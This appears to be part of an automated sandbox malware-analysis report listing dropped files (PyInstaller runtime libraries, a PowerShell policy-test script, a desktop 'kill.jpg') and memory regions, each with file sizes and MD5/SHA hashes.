                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                          MD5

                                                                                                                                                          7355f4a1d4e1a2519a4a60ee11f1d192

                                                                                                                                                          SHA1

                                                                                                                                                          8802bbb71f3e8947c02a7d835b31c7abf4289780

                                                                                                                                                          SHA256

                                                                                                                                                          2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3

                                                                                                                                                          SHA512

                                                                                                                                                          7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\VCRUNTIME140.dll
                                                                                                                                                          Filesize

                                                                                                                                                          116KB

                                                                                                                                                          MD5

                                                                                                                                                          be8dbe2dc77ebe7f88f910c61aec691a

                                                                                                                                                          SHA1

                                                                                                                                                          a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                                                                                          SHA256

                                                                                                                                                          4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                                                                                          SHA512

                                                                                                                                                          0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\_bz2.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          83KB

                                                                                                                                                          MD5

                                                                                                                                                          223fd6748cae86e8c2d5618085c768ac

                                                                                                                                                          SHA1

                                                                                                                                                          dcb589f2265728fe97156814cbe6ff3303cd05d3

                                                                                                                                                          SHA256

                                                                                                                                                          f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb

                                                                                                                                                          SHA512

                                                                                                                                                          9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\_cffi_backend.cp312-win_amd64.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          178KB

                                                                                                                                                          MD5

                                                                                                                                                          0572b13646141d0b1a5718e35549577c

                                                                                                                                                          SHA1

                                                                                                                                                          eeb40363c1f456c1c612d3c7e4923210eae4cdf7

                                                                                                                                                          SHA256

                                                                                                                                                          d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7

                                                                                                                                                          SHA512

                                                                                                                                                          67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\_ctypes.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          122KB

                                                                                                                                                          MD5

                                                                                                                                                          bbd5533fc875a4a075097a7c6aba865e

                                                                                                                                                          SHA1

                                                                                                                                                          ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00

                                                                                                                                                          SHA256

                                                                                                                                                          be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570

                                                                                                                                                          SHA512

                                                                                                                                                          23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\_decimal.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          245KB

                                                                                                                                                          MD5

                                                                                                                                                          3055edf761508190b576e9bf904003aa

                                                                                                                                                          SHA1

                                                                                                                                                          f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890

                                                                                                                                                          SHA256

                                                                                                                                                          e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577

                                                                                                                                                          SHA512

                                                                                                                                                          87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\_hashlib.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          64KB

                                                                                                                                                          MD5

                                                                                                                                                          eedb6d834d96a3dffffb1f65b5f7e5be

                                                                                                                                                          SHA1

                                                                                                                                                          ed6735cfdd0d1ec21c7568a9923eb377e54b308d

                                                                                                                                                          SHA256

                                                                                                                                                          79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2

                                                                                                                                                          SHA512

                                                                                                                                                          527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\_lzma.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          156KB

                                                                                                                                                          MD5

                                                                                                                                                          05e8b2c429aff98b3ae6adc842fb56a3

                                                                                                                                                          SHA1

                                                                                                                                                          834ddbced68db4fe17c283ab63b2faa2e4163824

                                                                                                                                                          SHA256

                                                                                                                                                          a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c

                                                                                                                                                          SHA512

                                                                                                                                                          badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\_socket.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          81KB

                                                                                                                                                          MD5

                                                                                                                                                          dc06f8d5508be059eae9e29d5ba7e9ec

                                                                                                                                                          SHA1

                                                                                                                                                          d666c88979075d3b0c6fd3be7c595e83e0cb4e82

                                                                                                                                                          SHA256

                                                                                                                                                          7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a

                                                                                                                                                          SHA512

                                                                                                                                                          57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\base_library.zip
                                                                                                                                                          Filesize

                                                                                                                                                          1.3MB

                                                                                                                                                          MD5

                                                                                                                                                          08332a62eb782d03b959ba64013ac5bc

                                                                                                                                                          SHA1

                                                                                                                                                          b70b6ae91f1bded398ca3f62e883ae75e9966041

                                                                                                                                                          SHA256

                                                                                                                                                          8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288

                                                                                                                                                          SHA512

                                                                                                                                                          a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\cryptography\hazmat\bindings\_rust.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          6.9MB

                                                                                                                                                          MD5

                                                                                                                                                          61d63fbd7dd1871392997dd3cef6cc8e

                                                                                                                                                          SHA1

                                                                                                                                                          45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9

                                                                                                                                                          SHA256

                                                                                                                                                          ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5

                                                                                                                                                          SHA512

                                                                                                                                                          c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\libcrypto-3.dll
                                                                                                                                                          Filesize

                                                                                                                                                          5.0MB

                                                                                                                                                          MD5

                                                                                                                                                          e547cf6d296a88f5b1c352c116df7c0c

                                                                                                                                                          SHA1

                                                                                                                                                          cafa14e0367f7c13ad140fd556f10f320a039783

                                                                                                                                                          SHA256

                                                                                                                                                          05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

                                                                                                                                                          SHA512

                                                                                                                                                          9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\libffi-8.dll
                                                                                                                                                          Filesize

                                                                                                                                                          38KB

                                                                                                                                                          MD5

                                                                                                                                                          0f8e4992ca92baaf54cc0b43aaccce21

                                                                                                                                                          SHA1

                                                                                                                                                          c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                                                                                                                                                          SHA256

                                                                                                                                                          eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                                                                                                                                                          SHA512

                                                                                                                                                          6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\python3.DLL
                                                                                                                                                          Filesize

                                                                                                                                                          66KB

                                                                                                                                                          MD5

                                                                                                                                                          79b02450d6ca4852165036c8d4eaed1f

                                                                                                                                                          SHA1

                                                                                                                                                          ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

                                                                                                                                                          SHA256

                                                                                                                                                          d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

                                                                                                                                                          SHA512

                                                                                                                                                          47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\python312.dll
                                                                                                                                                          Filesize

                                                                                                                                                          6.6MB

                                                                                                                                                          MD5

                                                                                                                                                          3c388ce47c0d9117d2a50b3fa5ac981d

                                                                                                                                                          SHA1

                                                                                                                                                          038484ff7460d03d1d36c23f0de4874cbaea2c48

                                                                                                                                                          SHA256

                                                                                                                                                          c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

                                                                                                                                                          SHA512

                                                                                                                                                          e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\select.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          29KB

                                                                                                                                                          MD5

                                                                                                                                                          92b440ca45447ec33e884752e4c65b07

                                                                                                                                                          SHA1

                                                                                                                                                          5477e21bb511cc33c988140521a4f8c11a427bcc

                                                                                                                                                          SHA256

                                                                                                                                                          680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3

                                                                                                                                                          SHA512

                                                                                                                                                          40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI45602\unicodedata.pyd
                                                                                                                                                          Filesize

                                                                                                                                                          1.1MB

                                                                                                                                                          MD5

                                                                                                                                                          16be9a6f941f1a2cb6b5fca766309b2c

                                                                                                                                                          SHA1

                                                                                                                                                          17b23ae0e6a11d5b8159c748073e36a936f3316a

                                                                                                                                                          SHA256

                                                                                                                                                          10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04

                                                                                                                                                          SHA512

                                                                                                                                                          64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpdunt3m.nho.ps1
                                                                                                                                                          Filesize

                                                                                                                                                          60B

                                                                                                                                                          MD5

                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                          SHA1

                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                          SHA256

                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                          SHA512

                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                        • C:\Users\Admin\Desktop\kill.jpg
                                                                                                                                                          Filesize

                                                                                                                                                          498KB

                                                                                                                                                          MD5

                                                                                                                                                          880e51ca9da8406fd0648c3016ee5034

                                                                                                                                                          SHA1

                                                                                                                                                          12591660e44431b0f38224df8b5529f8c2589693

                                                                                                                                                          SHA256

                                                                                                                                                          fb7f87e9b4e33a1be7d67415f59c10b0436f7404c619157e0bce0ea7fa86e99e

                                                                                                                                                          SHA512

                                                                                                                                                          4a05412ed27086c602ebaa280564d9e60121fa5f758987285c3250789f7b197673cda0d22d2e66f9c5acacf9364fdeb076fc1d5fa28bee9bcc22454500304dcb

                                                                                                                                                        • \??\pipe\LOCAL\crashpad_3484_FRSECRQNEBZGJZSU
                                                                                                                                                          MD5

                                                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                          SHA1

                                                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                          SHA256

                                                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                          SHA512

                                                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                        • memory/2764-582-0x000002BB69390000-0x000002BB693C5000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          212KB

                                                                                                                                                        • memory/3596-554-0x000001786A290000-0x000001786A2C5000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          212KB

                                                                                                                                                        • memory/5004-223-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/5004-224-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/5004-225-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/5004-228-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/5004-212-0x00007FFF95C03000-0x00007FFF95C05000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          8KB

                                                                                                                                                        • memory/5004-222-0x00007FFF95C00000-0x00007FFF966C2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/5004-221-0x000002334CFA0000-0x000002334CFC2000-memory.dmp
                                                                                                                                                          Filesize

                                                                                                                                                          136KB